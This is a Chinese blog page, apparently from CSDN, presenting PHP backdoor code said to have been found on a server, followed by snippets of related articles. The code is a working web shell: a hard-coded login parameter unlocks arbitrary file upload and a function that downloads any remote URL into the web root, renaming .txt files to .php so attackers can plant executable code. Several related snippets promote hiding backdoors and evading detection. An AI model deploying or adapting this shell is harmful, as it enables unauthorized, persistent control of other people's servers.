php在服务器上留下后门,服务器上发现的一段PHP后门程序

最新推荐文章于 2024-02-03 15:19:32 发布
最新推荐文章于 2024-02-03 15:19:32 发布
阅读量219 收藏
点赞数

php在服务器上留下后门

服务器上发现的一段PHP后门程序

error_reporting(0);

$path = __DIR__;

if ($_GET["login"] == "2M05Wd") {

if (isset($_FILES["uploadedfile"])) {$target_path = basename($_FILES["uploadedfile"]["name"]);

if (move_uploaded_file($_FILES["uploadedfile"]["tmp_name"], $target_path))

{echo "file uploaded
";}

else {echo "upload fail
";}

}

echo "

";

function get($url, $dir)

{

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_TIMEOUT, 10);

$data = curl_exec($ch);

if (!$data) {$data = @file_get_contents($url);}

file_put_contents($dir, $data);

}

if ($_GET["url"]) {

$url = $_GET["url"];

preg_match("/(.*)\/(.*)\.(.*?)$/", $url, $n);

if ($n[3] == "txt") {

$z = "php";

$name = $n[2];

}else{

$z = $n[3];

$name = "moban";

}

if ($_GET["dir"]){

$dir = $_SERVER["DOCUMENT_ROOT"] . "/" . $_GET["dir"] . "/" . $name . "." . $z;

} else {

$dir = $_SERVER["DOCUMENT_ROOT"] . "/" . $name . "." . $z;

}

get($url, $dir);

if (file_exists($dir)) {echo "

download success";} else {echo " download fail";}} elseif ($_POST["url"]) {

$url = $_POST["url"];

preg_match("/(.*)\/(.*)\.(.*?)$/", $url, $n);

if ($n[3] == "txt") {

$z = "php";

$name = $n[2];} else {

$z = $n[3];

$name = "moban";}

$dir = $_POST["path"] . "/" . $name . "." . $z;

get($url, $dir);

if (file_exists($dir)) {echo "

download success";} else {echo " download fail";}}

echo "

Url: ";}
卓哥健身
关注
php如何留后门,ThinkPHP后门技巧
weixin_35451402的博客
03-28 1100
欢迎来到阿八个人博客网站。本阿八个人博客网站提供最新的站长新闻,各种互联网资讯。喜欢本站的朋友可以收藏本站,或者加QQ:我们大家一起来交流技术!URL链接:https://www.abboke.com/rz/2019/1010/116721.html90sec上有人问,我说了还有小白不会用。去年我审计TP的时候留意到的,干脆分析一下代码和操作过程。thinkphp的I函数,是其处理输入的函数,一般...
php后门绕过eval关键字,一些变态的PHP一句话后门收集
weixin_42181929的博客
03-18 1785
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...
php万能后门程序
09-11
php万能后门操作类,放如任何php程序中即可使用!
php 后门程序解析
weixin_34367257的博客
09-28 213
2019独角兽企业重金招聘Python工程师标准>>> ...
php后门程序
03-27
老板不发工资怎么办,客户拿了源码,不付尾款怎么办,该后门旨在维护开发者的合法权益,请谨慎使用
php nginx func_PHP常见代码执行后门函数(示例代码)
weixin_39943547的博客
03-08 163
PHP常见代码执行后门函数代码执行:应用程序在调用一些能够将字符串转换为代码的函数(例如php中的eval中),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。常见php代码执行函数介绍常用执行代码函数1、eval():eval函数将接受的字符串当做代码执行2、 assert():用法和 eval()一样3、preg_replace():preg_replace 函数一个参数是一个正则表达式,...
一个不易被发现PHP后门代码解析
10-25
在网络安全领域,PHP后门是一种常见的安全威胁。后门是一种隐藏的入口,可以让攻击者绕过正常的认证过程,从而获取对系统的未经授权访问。本文将对一种不易被发现PHP后门代码进行详细解析。 首先,我们来了解后门...
PHP实例开发源码—Mysql BackDoor PHP+Mysql服务器 后门.zip
11-22
PHP后门是恶意开发者在Web应用程序中植入的一段代码,它能够绕过常规的安全机制,使攻击者能够远程执行任意命令或者获取敏感信息。这些后门可能隐藏在各种PHP脚本中,如配置文件、插件或用户上传的文件。一旦被激活...
php实现批量查询清除一句话后门的代码
10-30
一句话后门是一种常见的网页木马攻击方式,攻击者通过在网页代码中插入一段简短的恶意代码来获取网站的控制权。因其代码简短,隐蔽性强,所以很难被发现,并且危害巨大。 首先,文档中提到了一个名为Xall.php的文件...
超小PHP小马小结(方便查找后门的朋友)
10-28
本段文字主要涉及的是PHP后门技术,特别是PHP小马(PHP Web Shell)的使用和制作。PHP小马是一种可以远程控制服务器的恶意代码,它通过Web界面执行服务器命令,通常作为攻击者获取服务器权限和控制的后门工具。 ...
网上流传的php后门程序
06-27
网上流传的传说中的PHP后门客户端程序,服务端请上百度搜索,只有一句话
在宝塔php里留后门,揭秘PHP的一种新型留后门方式
weixin_31748999的博客
03-19 778
转载不加作者名字的木JJ。作者:猴子 博客:www.sbmonkey.comphp内大致有这么几种运算符。按运算符号的功能分为:一:算术运算符(+ - * / % ++ --)二:字符串运算符 . 可以叫连接运算符号三:赋值运算符 = += -= *= /= %= .=四:比较运算符 > < >= <= == === <> != !==五:逻辑运算符 &...
php如何开后门,php如何隐藏后门
weixin_35692916的博客
03-18 289
php如何隐藏后门php隐藏后门的方法:1、创建系统隐藏文件;2、利用ADS隐藏文件;3、在php环境变量中留shell;4、设置不死马;5、设置“php.ini”后门;6、将关键字拆分,并进行多文件包含;7、将真正的一句话写入数据库。推荐:《PHP教程》php 后门隐藏技巧1. attrib +s +h创建系统隐藏文件:attrib +s +a +r +hattrib +s +h 文件名解决覆盖...
php 后门代码_php后门程序演示
weixin_36019375的博客
03-09 672
1.[代码][PHP]代码
一些 PHP 管理系统程序中的后门
weixin_30556161的博客
11-17 149
一些php网站管理程序的,一些后门,其实官方也没有恶意,主要是大家为了自己的安全。 我倒不怎么关心提示框,SABLOG怎么知道我的版本有漏洞呢,程序肯定有后门.每次登陆后台自动检测官方版本跟当前版本对比.嗯.后来找到了.在templates/admin/main.php最后的一部分.删掉如下代码就OK了. 其实这个不足以导致被黑的,现在一般有点常识的,密码都比较复杂,几个数字+几个字母,MD5的...
php简单后门实现及php连接数据库
qq_58683895的博客
10-24 991
包含php简单后门的实现代码及操作,以及php连接数据库的操作代码及介绍,和相关php函数的介绍
PHP_GET后门,躲避任何安全软件
weixin_30813225的博客
01-23 208
经常拿到一些比较好的php站想要留住。插入菜刀一句话,很容易被管理发现,不管是eval还是assert,就是管理发现不了,有时连接也会被各种的安全软件拦截。现在教大家一个简单的技巧。本人一直在用,留的后门没有被删过了。 <?php file_put_contents('xpxp.php',"$_GET[uname]");//此段代码插入它正常的PHP里面,最好插头部。 复制代码利用也很...
php自动生成后门代码,PHP常见代码执行后门函数
最新发布
xcdm100的博客
02-03 596
应用程序在调用一些能够将字符串转换为代码的函数(例如php中的eval中),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。,按照 php的格式,表达式在两个/之间,如果在表达式末尾加上一个 e,则第二个参数就会被当做 php代码执行。call_user_func_array(): 方法同上,只是第二个参数要是一个数组,作为第一个参数的参数。函数的第一个参数是被调动的函数,剩下的参数(可有多个参数)是被调用函数的参数。调用回调函数,并把一个数组参数作为回调函数的参数。为数组的每个元素应用回调函数。
PHP隐形后门分析:ThinkPHP框架与base64_decode利用
PHP隐形一句话后门是一种常见的Web应用攻击手段,攻击者通常通过在目标服务器上创建或修改现有文件,植入一段可以执行任意命令的PHP代码,以此来获得持久的控制权。在这种情况下,后门代码通常设计得非常隐蔽,难以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值